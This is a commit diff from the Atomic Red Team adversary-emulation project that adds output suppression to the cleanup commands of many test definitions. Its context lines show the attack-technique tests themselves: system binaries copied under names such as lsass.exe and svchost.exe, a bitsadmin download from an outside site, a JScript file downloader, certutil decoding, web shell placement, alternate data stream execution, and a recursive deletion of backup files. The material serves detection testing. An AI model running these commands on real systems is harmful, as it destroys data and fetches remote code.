Fixed cleanup commands (redcanaryco#869)

Co-authored-by: Carrie Roberts <[email protected]>

atomics/T1036/T1036.yaml

@@ -17,7 +17,7 @@ atomic_tests:
       cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
       cmd.exe /c %SystemRoot%\Temp\lsass.exe
     cleanup_command: |
-      del /Q /F %SystemRoot%\Temp\lsass.exe
+      del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 
 - name: Masquerading as Linux crond process.
   description: |
@@ -47,7 +47,7 @@ atomic_tests:
       copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
       cmd.exe /c %APPDATA%\notepad.exe /B
     cleanup_command: |
-      del /Q /F %APPDATA%\notepad.exe
+      del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 
 - name: Masquerading - wscript.exe running as svchost.exe
   description: |
@@ -63,7 +63,7 @@ atomic_tests:
       copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
       cmd.exe /c %APPDATA%\svchost.exe /B
     cleanup_command: |
-      del /Q /F %APPDATA%\svchost.exe
+      del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 
 - name: Masquerading - powershell.exe running as taskhostw.exe
   description: |
@@ -79,7 +79,7 @@ atomic_tests:
       copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
       cmd.exe /K %APPDATA%\taskhostw.exe
     cleanup_command: |
-      del /Q /F %APPDATA%\taskhostw.exe
+      del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 
 - name: Masquerading - non-windows exe running as windows exe
   description: |
@@ -159,5 +159,5 @@ atomic_tests:
       copy C:\Windows\System32\cmd.exe C:\lsm.exe
       C:\lsm.exe /c echo T1036 > C:\T1036.txt
     cleanup_command: |
-      del C:\T1036.txt
-      del C:\lsm.exe
+      del C:\T1036.txt >nul 2>&1
+      del C:\lsm.exe >nul 2>&1

atomics/T1038/T1038.yaml

@@ -18,5 +18,5 @@ atomic_tests:
       copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
       %APPDATA%\updater.exe -Command exit
     cleanup_command: |
-      del %APPDATA%\updater.exe
-      del %APPDATA%\amsi.dll
+      del %APPDATA%\updater.exe >nul 2>&1
+      del %APPDATA%\amsi.dll >nul 2>&1

atomics/T1055/T1055.yaml

@@ -130,6 +130,6 @@ atomic_tests:
       copy C:\Windows\System32\cmd.exe C:\svchost.exe
       C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
     cleanup_command: |
-      del C:\T1055.txt
-      del C:\svchost.exe
+      del C:\T1055.txt >nul 2>&1
+      del C:\svchost.exe >nul 2>&1
       

atomics/T1064/T1064.yaml

@@ -44,4 +44,4 @@ atomic_tests:
       C:\Windows\system32\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}
       C:\Windows\system32\cmd.exe /Q /c #{script_to_create} 
     cleanup_command: |
-      del #{script_to_create}
+      del #{script_to_create} >nul 2>&1

atomics/T1071/T1071.yaml

@@ -210,4 +210,4 @@ atomic_tests:
       echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
       cscript //E:Jscript #{script_file}
     cleanup_command: |
-      del #{script_file} /F /Q
+      del #{script_file} /F /Q >nul 2>&1

atomics/T1100/T1100.yaml

@@ -37,4 +37,4 @@ atomic_tests:
     command: |
       xcopy #{web_shells} #{web_shell_path}
     cleanup_command: |
-      del #{web_shell_path}
+      del #{web_shell_path} >nul 2>&1

atomics/T1102/T1102.yaml

@@ -14,7 +14,7 @@ atomic_tests:
     command: |
       bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
     cleanup_command: |
-      del %TEMP%\bitsadmindownload.html
+      del %TEMP%\bitsadmindownload.html >nul 2>&1
 
 
 - name: Reach out to C2 Pointer URLs via powershell

atomics/T1105/T1105.yaml

@@ -276,7 +276,7 @@ atomic_tests:
        pushd #{destination_path}
        echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
        CScript.exe AtomicTestT1105.js //E:JScript
-       del AtomicTestT1105.js /Q
-       del AtomicTestFileT1105.js /Q
+       del AtomicTestT1105.js /Q >nul 2>&1
+       del AtomicTestFileT1105.js /Q >nul 2>&1
        popd
        

atomics/T1107/T1107.yaml

@@ -60,7 +60,7 @@ atomic_tests:
     elevation_required: false
     command: |
       echo "T1107" > %temp%\T1107.txt
-      del /f  %temp%\T1107.txt
+      del /f  %temp%\T1107.txt >nul 2>&1
 
 - name: Delete an entire folder - Windows cmd
   description: |

atomics/T1114/T1114.yaml

@@ -22,4 +22,4 @@ atomic_tests:
     command: |
       powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1 -file #{output_file}
     cleanup_command: |
-      del #{output_file}
+      del #{output_file} >nul 2>&1

atomics/T1115/T1115.yaml

@@ -17,7 +17,7 @@ atomic_tests:
       echo "T1115" > %temp%\T1115.txt
       clip < %temp%\T1115.txt
     cleanup_command: |
-      del %temp%\T1115.txt
+      del %temp%\T1115.txt >nul 2>&1
 
 - name: PowerShell
   description: |

atomics/T1119/T1119.yaml

@@ -60,7 +60,7 @@ atomic_tests:
       wmic process list > %TEMP%\T1119_3.txt
       tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
     cleanup_command: |
-      del %TEMP%\T1119_1.txt >$null 2>&1
-      del %TEMP%\T1119_2.txt >$null 2>&1
-      del %TEMP%\T1119_3.txt >$null 2>&1
-      del %TEMP%\T1119_4.txt >$null 2>&1
+      del %TEMP%\T1119_1.txt >nul 2>&1
+      del %TEMP%\T1119_2.txt >nul 2>&1
+      del %TEMP%\T1119_3.txt >nul 2>&1
+      del %TEMP%\T1119_4.txt >nul 2>&1

atomics/T1121/T1121.yaml

@@ -35,7 +35,7 @@ atomic_tests:
       C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
       C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
     cleanup_command: |
-      del #{file_name}
+      del #{file_name} >nul 2>&1
 
 - name: Regsvs Uninstall Method Call Test
   description: |
@@ -72,5 +72,5 @@ atomic_tests:
       C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
       C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
     cleanup_command: |
-      del #{file_name} >$null 2>&1
-      del key.snk >$null 2>&1
+      del #{file_name} >nul 2>&1
+      del key.snk >nul 2>&1

atomics/T1140/T1140.yaml

@@ -20,8 +20,8 @@ atomic_tests:
       certutil -encode #{executable} %temp%\T1140_calc.txt
       certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
     cleanup_command: |
-      del %temp%\T1140_calc.txt
-      del %temp%T1140_calc_decoded.exe
+      del %temp%\T1140_calc.txt >nul 2>&1
+      del %temp%T1140_calc_decoded.exe >nul 2>&1
 
 - name: Certutil Rename and Decode
   description: |
@@ -40,5 +40,5 @@ atomic_tests:
       copy %windir%\system32\certutil.exe %temp%\tcm.tmp
       %temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt
     cleanup_command: |
-      del %temp%\tcm.tmp
-      del %temp%\T1140.txt
+      del %temp%\tcm.tmp >nul 2>&1
+      del %temp%\T1140.txt >nul 2>&1

atomics/T1145/T1145.yaml

@@ -16,7 +16,7 @@ atomic_tests:
       echo "ATOMICREDTEAM" > %windir%\cert.key
       dir c:\ /b /s .key | findstr /e .key
     cleanup_command: |
-      del c:\Windows\cert.key
+      del c:\Windows\cert.key >nul 2>&1
 
 - name: Discover Private SSH Keys
   description: |

atomics/T1158/T1158.yaml

@@ -41,7 +41,7 @@ atomic_tests:
       echo T1158 > %TEMP%\T1158.txt
       attrib.exe +s %TEMP%\T1158.txt
     cleanup_command: |
-      del /A:S %TEMP%\T1158.txt
+      del /A:S %TEMP%\T1158.txt >nul 2>&1
 
 - name: Create Windows Hidden File with Attrib
   description: |
@@ -55,7 +55,7 @@ atomic_tests:
       echo T1158_hidden > %TEMP%\T1158_hidden.txt
       attrib.exe +h %TEMP%\T1158_hidden.txt
     cleanup_command: |
-      del /A:H %TEMP%\T1158_hidden.txt
+      del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
 
 - name: Hidden files
   description: |
@@ -122,7 +122,7 @@ atomic_tests:
       echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
       for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
     cleanup_command: |
-      del #{file_name}
+      del #{file_name} >nul 2>&1
 
 - name: Create ADS PowerShell
   description: |

atomics/T1197/T1197.yaml

@@ -24,7 +24,7 @@ atomic_tests:
     command: |
       bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file}
     cleanup_command: |
-      del #{local_file}
+      del #{local_file} >nul 2>&1
 
 - name: Download & Execute via PowerShell BITS
   description: |

atomics/T1485/T1485.yaml

@@ -101,4 +101,4 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
     command: |
-      del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+      del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1

atomics/T1500/T1500.yaml

@@ -37,4 +37,4 @@ atomic_tests:
     command: |
       C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
     cleanup_command: | 
-      del #{output_file}
+      del #{output_file} >nul 2>&1